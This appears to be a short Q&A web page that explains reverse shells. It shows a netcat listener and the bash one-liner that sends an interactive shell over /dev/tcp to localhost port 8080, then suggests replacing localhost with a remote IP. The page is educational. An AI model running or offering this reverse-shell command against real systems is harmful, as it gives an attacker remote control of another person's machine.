What is a reverse shell?

It’s a(n insecure) remote shell introduced by the target. That’s the opposite of a “normal” remote shell, that is introduced by the source.

Let’s try it with localhost instead of 10.0.0.1:

  • Open two tabs in your terminal.
    1. open TCP port 8080 and wait for a connection:nc localhost -lp 8080
    2. Open an interactive shell, and redirect the IO streams to a TCP socket:bash -i >& /dev/tcp/localhost/8080 0>&1 where
      • bash -i “If the -i option is present, the shell is interactive.”
      • >& “This special syntax redirects both, stdout and stderr to the specified target.”
      • (argument for >&/dev/tcp/localhost/8080 is a TCP client connection to localhost:8080.
      • 0>&1 redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.
      Cf. http://wiki.bash-hackers.org/syntax/redirection
  • Rejoice as you have a prompt in tab 1.
  • Now imagine not using localhost, but some remote IP.

Related Posts:

  1. How do I split a string on a delimiter in Bash?
  2. When is K 1024 and when is it 1000?
  3. Dial pad to get phone number (with Android button images)
  4. How to use execvp()
  5. How to use execvp() to execute a command
  6. Why is it not possible to fake an IP address?
  7. Authentication versus Authorization
  8. No results found on kibana -> discover
  9. Official definition of CSCI (Computer Software Configuration Item)
  10. What does %>% mean in R [duplicate]
  11. Turn off pager for psql’s interactive output
  12. What does “xmlns” in XML mean?
  13. How do I get my C# program to sleep for 50 msec?
  14. What is an idiomatic way of representing enums in Go?
  15. Why the range of int is -32768 to 32767?
  16. syntaxerror: “unexpected character after line continuation character in python” math
  17. How to grep for case insensitive string in a file?
  18. Flash Player Projector post 2020
  19. Error in .External.graphics R
  20. How to reload .bashrc settings without logging out and back in again?
  21. Assembly’s manifest definition does not match assembly reference
  22. “unrecognized selector sent to instance” error in Objective-C
  23. How can I declare and use Boolean variables in a shell script?
  24. Java – No enclosing instance of type Foo is accessible
  25. what is the difference between OLE DB and ODBC data sources?
  26. How to use PHP’s password_hash to hash and verify passwords
  27. How to create a custom coder?
  28. Git push won’t do anything (everything up-to-date)
  29. What’s the complete range for Chinese characters in Unicode?
  30. Is there an operation for not less than or not greater than in python?
  31. Resource interpreted as stylesheet but transferred with MIME type text/html (seems not related with web server)
  32. Background color for Tk in Python
  33. how to uninstall MinGW and make cygwin ‘make’ as deafult make program with gcc 3.8.1
  34. Cosine similarity and tf-idf
  35. Optional Parameters in Go?
  36. -bash: export: `=’: not a valid identifier
  37. get “ERROR: Can’t get master address from ZooKeeper; znode data == null” when using Hbase shell
  38. how to fix the issue “Command /bin/sh failed with exit code 1” in iphone
  39. Error “The goal you specified requires a project to execute but there is no POM in this directory” after executing maven command
  40. Error in glm() in R
  41. What is a good Hash Function?
  42. Excel Filters – show only relevant values in the filter
  43. Implementing shell in C and need help handling input/output redirection
  44. Create a new file in git bash
  45. Unable to convert 3d ply file image to 2d image
  46. Get a random item from a JavaScript array
  47. Remove node_modules from git in vscode
  48. How do you change session timeout in IIS 8.5?
  49. Implementation of multiple pipes in C
  50. chmod: changing permissions of ‘my_script.sh’: Operation not permitted
  51. Is it valid to have a html form inside another html form?
  52. what is shortcut command to kill process in windows command?
  53. How to print variable in sml?
  54. Why is the minidlna database not being refreshed?
  55. java.sql.SQLException: Fail to convert to internal representation
  56. Representing EOF in C code?
  57. How to disable an Android button?
  58. How to set initial value and auto increment in MySQL?
  59. Difference between sh and Bash
  60. Chrome Broweser: csi.gstatic.com keeps loading
  61. How do you convert an entire directory with ffmpeg?
  62. Why am I getting Permission Denied when trying to push a Sqlite file to my rooted Android device?
  63. What’s the difference between sx and σx in the statistics calculations on a TI-Nspire?
  64. Apache Kafka vs Apache Storm
  65. How can an Admin access the Google Drive contents of all the users in a particular domain?
  66. PSEXEC, access denied errors
  67. How do you define a global function in C++?
  68. A _disk_id.pod file appears on a windows flash drive
  69. What standard do language codes of the form “zh-Hans” belong to?
  70. database collation differences
  71. Add Woocommerce product to cart with Contact Form 7 [closed]
  72. How to See Everything in get_option()?
  73. How can I prevent the WordPress Importer from munging double-newline paragraph breaks to a single newline?
  74. A Compare And Distinction Essay Define To Beat Writer’s Block
  75. 27 Outstanding Faculty Essay Examples
  76. The Way To Write An Essay Outline In Four Steps
  77. Javascript: Add anchor hashtag to URL, and reload
  78. To remove rendering of menus and header, plugin or theme?
  79. How do I deal with a compromised server?
  80. Something is burning in the server room; how can I quickly identify what it is?
  81. Finding out what user Apache is running as?
  82. Do systemd unit files have to be reloaded when modified?
  83. Shell command to monitor changes in a file
  84. What is a glue record?
  85. How do I convert a .cer certificate to .pem?
  86. Run Oracle SQL script and exit from sqlplus.exe via command prompt
  87. Show full process name in top
  88. How do you do load testing and capacity planning for web sites?
  89. What is a good SSH server to use on Windows? [closed]
  90. What’s the difference betwen the single dash and double dash flags on shell commands?
  91. In systemd, what’s the difference between After= and Requires=?
  92. Windows Server restart / shutdown history
  93. How do I set the global PATH environment variable on OS X?
  94. Adding a directory to $PATH in CentOS?
  95. nmap find all alive hostnames and IPs in LAN
  96. How to let ‘cp’ command don’t fire an error when source file does not exist?
  97. Should CNAME Be Used For Subdomains?
  98. How do I create user accounts from the Terminal in Mac OS X 10.5?
  99. How to get a .pem file from ssh key pair?
  100. How to inspect remote SMTP server’s TLS certificate?

Leave a Comment